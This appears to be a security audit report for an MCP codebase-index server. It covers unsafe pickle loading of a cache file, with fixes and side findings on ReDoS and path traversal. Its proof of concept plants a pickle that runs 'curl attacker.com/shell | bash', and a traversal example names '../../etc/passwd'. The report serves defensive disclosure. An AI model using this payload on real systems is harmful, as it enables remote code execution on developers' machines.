Summary
The cache loader in server.py calls pickle.load() on .codebase-index-cache.pkl before any validation. Because pickle.load() can execute arbitrary code during deserialization (for example through an object's __reduce__), the isinstance() checks that follow run too late to offer any protection.
Vulnerable code
# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
    path = _cache_path(project_root)
    if not os.path.exists(path):
        return None
    try:
        with open(path, "rb") as f:
            payload = pickle.load(f)  # <-- code executes HERE
        if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
            return None
        index = payload["index"]
        if not isinstance(index, PI):
            return None
        return index
    # (the except clause that closes this try block is not shown in this excerpt)
Attack vector
Any process with write access to the project directory can plant a malicious .codebase-index-cache.pkl:
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

with open(".codebase-index-cache.pkl", "wb") as f:
    pickle.dump({"version": 1, "index": Exploit()}, f)
On the next MCP server start (or first tool call), _ensure_index() -> _load_cache() runs the payload with the privileges of the MCP server process.
A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.
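For anyone who wants to confirm the ordering problem without running a real payload, here is a harmless reproduction sketch. It is not the server code: load_like_server is a simplified stand-in for _load_cache, ExpectedIndex is a hypothetical placeholder for the real index class, and _CACHE_VERSION = 1 is assumed. The probe's only side effect is creating an empty directory inside a temporary folder.

```python
import os
import pickle
import tempfile

_CACHE_VERSION = 1  # assumed value, matching the proof of concept above


class ExpectedIndex:
    """Hypothetical stand-in for the real index class (PI in server.py)."""


class BenignProbe:
    """Plays the role of the malicious object; it only creates a directory."""

    def __init__(self, marker: str) -> None:
        self.marker = marker

    def __reduce__(self):
        # pickle records "call os.mkdir(marker)" and replays it at load time.
        return (os.mkdir, (self.marker,))


def load_like_server(path: str):
    """Simplified stand-in for _load_cache: unpickle first, validate afterwards."""
    with open(path, "rb") as f:
        payload = pickle.load(f)  # the probe's side effect happens here
    if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
        return None
    index = payload["index"]
    if not isinstance(index, ExpectedIndex):
        return None
    return index


def probe_fires_before_validation():
    """Return (side_effect_happened, loader_result) for a planted cache file."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "probe-ran")
        cache_file = os.path.join(tmp, "cache.pkl")
        with open(cache_file, "wb") as f:
            pickle.dump({"version": _CACHE_VERSION, "index": BenignProbe(marker)}, f)
        result = load_like_server(cache_file)
        return os.path.isdir(marker), result
```

The loader rejects the file and returns None, yet the marker directory already exists by then. That is the whole issue: validation after pickle.load() cannot undo what the load already did.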
Suggested fix
Option A — Replace pickle with JSON (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). Eliminates the attack surface entirely.
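To make Option A concrete, here is a minimal sketch of a JSON-backed cache. I don't know the real shape of ProjectIndex, so FileSummary, its fields, save_cache and load_cache are all hypothetical names used for illustration, and _CACHE_VERSION = 1 is assumed. The point is only that json.load() yields plain dicts, lists, strings and numbers, so a malformed or hostile file can at worst be rejected.

```python
import json
import os
from dataclasses import asdict, dataclass, field

_CACHE_VERSION = 1  # assumed value


@dataclass
class FileSummary:
    """Hypothetical per-file record; the real index fields will differ."""

    path: str
    functions: list[str] = field(default_factory=list)
    line_count: int = 0


def save_cache(cache_path: str, files: list[FileSummary]) -> None:
    payload = {"version": _CACHE_VERSION, "files": [asdict(f) for f in files]}
    tmp_path = cache_path + ".tmp"
    with open(tmp_path, "w", encoding="utf-8") as f:
        json.dump(payload, f)
    # Swap the finished file into place so readers never see a partial write.
    os.replace(tmp_path, cache_path)


def load_cache(cache_path: str) -> "list[FileSummary] | None":
    try:
        with open(cache_path, encoding="utf-8") as f:
            payload = json.load(f)  # produces plain data only, never code
    except (OSError, ValueError):
        # Missing, unreadable, or not valid JSON: treat as a cache miss.
        return None
    if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
        return None
    try:
        # Unknown or missing keys raise TypeError; field types are not
        # checked here and would need their own validation.
        return [FileSummary(**entry) for entry in payload["files"]]
    except (KeyError, TypeError):
        return None
```

A cache miss simply triggers a rebuild, so returning None on any parse problem should be a safe default here.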
Option B — SafeUnpickler with allowlist:
import pickle

_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

# in _load_cache, replacing pickle.load(f):
payload = SafeUnpickler(f).load()
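One caveat on Option B, with a sketch of a stricter variant. As far as I can tell, find_class resolves dotted names for pickle protocol 4 and later, so a module-wide allowlist may also admit anything an allowed module happens to import (for example an os attribute reachable through it). Allowlisting exact (module, name) pairs avoids that. The pair below is hypothetical, since I have not checked which classes the index actually stores, and Probe is a harmless stand-in for a malicious object.

```python
import io
import os
import pickle

# Hypothetical allowlist of exact (module, class name) pairs; fill in the
# classes that really appear inside the cached index.
_SAFE_CLASSES = {
    ("mcp_codebase_index.models", "ProjectIndex"),
}


class StrictUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Reject every global that is not explicitly listed.
        if (module, name) not in _SAFE_CLASSES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)


class Probe:
    """Harmless stand-in for a malicious object: asks pickle to call os.getcwd()."""

    def __reduce__(self):
        return (os.getcwd, ())


def is_blocked(obj) -> bool:
    """Return True if StrictUnpickler refuses to load a cache containing obj."""
    data = pickle.dumps({"version": 1, "index": obj})
    try:
        StrictUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False
```

Plain containers (dicts, lists, strings, ints) never go through find_class, so they still load; only references to importable callables and classes are filtered. Option A remains the simpler choice because it removes the need to maintain this list at all.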
Additional findings from the same audit
- ReDoS in search_codebase (query_api.py): a user-supplied regex is applied to every line with no timeout. Mitigation: use the third-party regex library with timeout=2.0, or signal.alarm.
- Path traversal in reindex_file (project_indexer.py ~L186): a path such as ../../etc/passwd is not validated against the project root. Fix: at minimum if rel_path.startswith(".."): raise ValueError; resolving the path and checking that it stays under the root would also cover inputs like a/../../x and absolute paths.
- Ambiguous endswith matching in _resolve_file (query_api.py ~L233): can return unintended files.
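For the reindex_file finding, a containment check on the resolved path is a possible shape for the fix. This is a sketch, not the project's code: resolve_inside_root is a hypothetical helper name, and Path.is_relative_to needs Python 3.9 or newer.

```python
from pathlib import Path


def resolve_inside_root(project_root: str, rel_path: str) -> Path:
    """Resolve rel_path under project_root, rejecting anything that escapes it."""
    root = Path(project_root).resolve()
    # Joining with an absolute rel_path discards root, and resolve() collapses
    # ".." segments and symlinks, so both cases fail the check below.
    candidate = (root / rel_path).resolve()
    if not candidate.is_relative_to(root):
        raise ValueError(f"path escapes project root: {rel_path!r}")
    return candidate
```

Because the comparison is made after resolution, it does not depend on where the ".." appears in the input string.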
Environment
Discovered during a local security audit before production deployment. Cache files added to .gitignore as interim mitigation. Happy to submit a PR.